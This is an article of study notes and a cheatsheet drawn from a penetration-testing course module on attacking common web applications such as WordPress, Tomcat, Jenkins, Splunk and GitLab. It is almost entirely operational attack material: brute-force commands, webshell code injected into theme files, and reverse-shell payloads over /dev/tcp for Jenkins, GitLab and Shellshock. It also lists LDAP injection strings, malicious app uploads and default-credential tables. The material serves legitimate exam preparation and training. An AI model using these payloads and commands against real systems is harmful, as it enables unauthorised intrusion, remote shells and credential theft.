All articles

Attacking Common Applications — WordPress, Tomcat, Jenkins, Splunk, GitLab and More (HTB CWES)

Built from the Attacking Common Applications module of the HTB Academy Web Penetration Tester path (HTB CWES). The module is huge; this is the operational per-application distillation — how to spot each app, enumerate it, and the key exploit path/command. Labs and full lessons are on HTB Academy.

Most real footholds come from off-the-shelf apps left exposed, outdated or default-configured. The method is always: discover → fingerprint the app+version → check default creds → exploit the known path (built-in functionality or a CVE).

1. Discovery across a scope

nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list   # web ports
nmap --open -sV 10.129.201.50                                                       # fingerprint a host
eyewitness --web -x web_discovery.xml -d out        # screenshot every service
cat web_discovery.xml | ./aquatone -nmap            # same, triage by homepage

Add discovered vhosts to /etc/hosts. Screenshots let you triage dozens of apps fast.

2. CMS — WordPress / Joomla / Drupal

WordPress — tells: wp-content, wp-json, /wp-login.php, <meta name="generator" content="WordPress">, X-Redirect-By: WordPress.

curl -s http://blog/ | grep -E 'WordPress|themes|plugins'
wpscan --url http://blog --enumerate --api-token TOKEN           # version, plugins, users
wpscan --password-attack xmlrpc -t 20 -U john -P rockyou.txt --url http://blog   # login brute

RCE: as admin, Appearance → Theme Editor → 404.php add system($_GET[0]); → curl .../themes/x/404.php?0=id; or Metasploit exploit/unix/webapp/wp_admin_shell_upload. Vulnerable plugins: mail-masta LFI (.../mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd), wpDiscuz RCE (CVE-2020-24186).

Joomla — tells: <meta generator="Joomla!">, /administrator/, version in administrator/manifests/files/joomla.xml or README.txt.

droopescan scan joomla --url http://dev/
python3 joomla-brute.py -u http://dev -w http_default_pass.txt -usr admin   # often admin:admin

RCE: admin → Templates → templates/protostar/error.php add system($_GET['x']);. Known: CVE-2019-10945 directory traversal.

Drupal — tells: <meta Generator="Drupal 8">, /node/1, CHANGELOG.txt for version; droopescan scan drupal -u ....

≤7: enable PHP filter module → create page with <?php system($_GET['x']);?>
8:  upload a backdoored module (tar.gz with shell.php + .htaccess) → /modules/<m>/shell.php
Drupalgeddon  (CVE-2014-3704, SQLi → add admin: drupalgeddon.py -t URL -u u -p p)
Drupalgeddon2 (CVE-2018-7600, drupalgeddon2.py → write mrb3n.php)
Drupalgeddon3 (CVE-2018-7602, msf multi/http/drupal_drupageddon3, needs session)

3. App & dev servers — Tomcat / Jenkins

Tomcat — tells: /docs title "Apache Tomcat 9", /manager/html. Creds live in tomcat-users.xml (roles manager-gui, admin-gui). Default/weak: tomcat:tomcat, admin:admin.

msf> use auxiliary/scanner/http/tomcat_mgr_login        # brute the manager
# WAR shell upload:
wget .../cmd.jsp ; zip -r backup.war cmd.jsp            # deploy via /manager/html → /backup/cmd.jsp?cmd=id
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4443 -f war > backup.war
# Ghostcat (CVE-2020-1938) — AJP 8009 file read:
python2.7 tomcat-ajp.lfi.py host -p 8009 -f WEB-INF/web.xml

Jenkins — tells: port 8080, "Jenkins" dashboard. Script Console (/script) runs Groovy → RCE (often as root/SYSTEM):

def p = ["/bin/bash","-c","exec 5<>/dev/tcp/IP/8443;cat <&5|while read l; do \$l 2>&5 >&5;done"] as String[]
Runtime.getRuntime().exec(p).waitFor()

4. Monitoring / SIEM — Splunk / PRTG

Splunk — port 8000 (REST on 8089). Default admin:changeme. Attack: upload a malicious app (.spl/.tar.gz with inputs.conf running a reverse-shell script) → runs as SYSTEM/root.

splunk_shell/bin/rev.py (or run.bat→run.ps1)  +  default/inputs.conf ([script://./bin/rev.py] disabled=0)
tar -cvzf updater.tar.gz splunk_shell/  → Install app from file → shell

PRTG — port 8080 "Indy httpd … Paessler PRTG". Try prtgadmin:Password123. RCE via Notifications (run a program; demo adds a local admin → validate with crackmapexec smb IP -u prtgadm1 -p 'Pwn3d_by_PRTG!').

5. Ticketing / DevOps — osTicket / GitLab

osTicket — tells: OSTSESSID cookie, "powered by osTicket" footer. Often yields creds via OSINT/breach dumps (dehashed) reused elsewhere.

GitLab — enumerate users (userenum script; sign-in error timing); authenticated RCE via known CVEs:

python3 gitlab_13_10_2_rce.py -t http://gitlab:8081 -u user -p pass -c 'bash -i >&/dev/tcp/IP/8443 0>&1'

6. CGI, Shellshock, IIS tilde, LDAP, mass assignment, thick clients

Tomcat CGI (.bat/.cmd) — fuzz ffuf -u .../cgi/FUZZ.bat; run commands via query string (welcome.bat?&dir); PATH is unset so hardcode full paths (?&c:\windows\system32\whoami.exe).

Shellshock (CGI) — a bash CGI; test and exploit via the User-Agent:

curl -H 'User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd' http://T/cgi-bin/access.cgi
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/7777 0>&1' http://T/cgi-bin/access.cgi

IIS tilde (8.3 short names) — leaks file/dir names on old IIS:

java -jar iis_shortname_scanner.jar 0 5 http://T/     # → e.g. TRANSF~1.ASP
gobuster dir -u http://T/ -w list.txt -x .asp,.aspx   # resolve the full name

LDAP injection — ldapsearch -H ldap://host -D "cn=admin,..." -w pass -b "..." "(filter)". In a login filter (&(objectClass=user)(sAMAccountName=$u)(userPassword=$p)), inject * / (cn=*) / (objectClass=*) to bypass auth.

Mass assignment — add extra parameters the form doesn't show (admin=true, confirmed, roleid=0) to a create/update request to escalate.

Thick clients — inspect with Ghidra/dnSpy/x64dbg/de4dot (binaries), JD-GUI (JARs), Wireshark/Burp (traffic). Common wins: hardcoded credentials (e.g. in a JAR's beans.xml), decompile→patch→recompile the client (resign the JAR MANIFEST.MF) to reach server-side path traversal / SQLi; reverse an ELF/DLL to recover DB connection strings (gdb breakpoint on SQLDriverConnect, Get-FileMetaData on a .NET DLL).

7. Default credentials to always try

App Default / weak creds
Tomcat Manager tomcat:tomcat, admin:admin, tomcat:s3cret
Splunk admin:changeme
PRTG prtgadmin:prtgadmin / Password123
WebSphere console system:manager
Nagios nagiosadmin:PASSW0RD
Routers/IoT (brute) see SecLists default-passwords.txt

Honorable mentions: Axis2 (AAR webshell), WebSphere (WAR deploy), Elasticsearch (old RCE), Zabbix (API RCE, SQLi), WebLogic (Java deserialization RCE), DotNetNuke, vCenter (CVE-2021-22005 OVA upload).

8. What to carry into the CWES exam

  • Screenshot the whole scope first (EyeWitness/Aquatone) — the foothold app is usually obvious at a glance.
  • Fingerprint app + version, then branch: CMS → WPScan/droopescan + admin-panel code-exec or plugin CVE; Tomcat → manager WAR; Jenkins → Script Console; Splunk/PRTG → malicious app/notification.
  • Always try default creds before anything clever (table above).
  • Built-in functionality is the easiest RCE: theme/template editors (WP/Joomla/Drupal), WAR deploy (Tomcat), Groovy console (Jenkins), app upload (Splunk).
  • CVE path: searchsploit <app> <version>, read the PoC, set LHOST/RHOST, run. The three skills assessments chain exactly these.

Cheatsheet — Attacking Common Applications

Discovery

nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web -iL scope
eyewitness --web -x web.xml -d out   |   cat web.xml | ./aquatone -nmap

WordPress / Joomla / Drupal

wpscan --url http://T --enumerate --api-token TOK
wpscan --password-attack xmlrpc -U user -P rockyou.txt --url http://T
# WP RCE: Theme editor 404.php = system($_GET[0]);  | msf wp_admin_shell_upload
droopescan scan joomla|drupal -u http://T       # Joomla brute: joomla-brute.py (admin:admin)
# Drupal: PHP filter (≤7) | backdoored module (8) | drupalgeddon{,2,3}

Tomcat / Jenkins

msf auxiliary/scanner/http/tomcat_mgr_login
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=P -f war > s.war   # deploy via /manager/html
python2.7 tomcat-ajp.lfi.py host -p 8009 -f WEB-INF/web.xml             # Ghostcat CVE-2020-1938
# Jenkins /script (Groovy): Runtime.getRuntime().exec(...) reverse shell

Splunk / PRTG

Splunk admin:changeme → upload .tar.gz app (inputs.conf → rev shell) = SYSTEM
PRTG prtgadmin:Password123 → Notifications → run program (add admin)

CGI / Shellshock / IIS / LDAP

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/7777 0>&1' http://T/cgi-bin/x.cgi
# Tomcat CGI: /cgi/welcome.bat?&c:\windows\system32\whoami.exe
java -jar iis_shortname_scanner.jar 0 5 http://T/   # → gobuster resolve
ldapsearch -H ldap://h -D "cn=admin,.." -w p -b ".." "(cn=*)"   # inject * / (objectClass=*)

Default creds: tomcat:tomcat · admin:changeme (Splunk) · prtgadmin:Password123 · system:manager (WebSphere) · nagiosadmin:PASSW0RD

Built from HTB Academy's Attacking Common Applications module — labs, lessons and the CWES exam are on HTB Academy.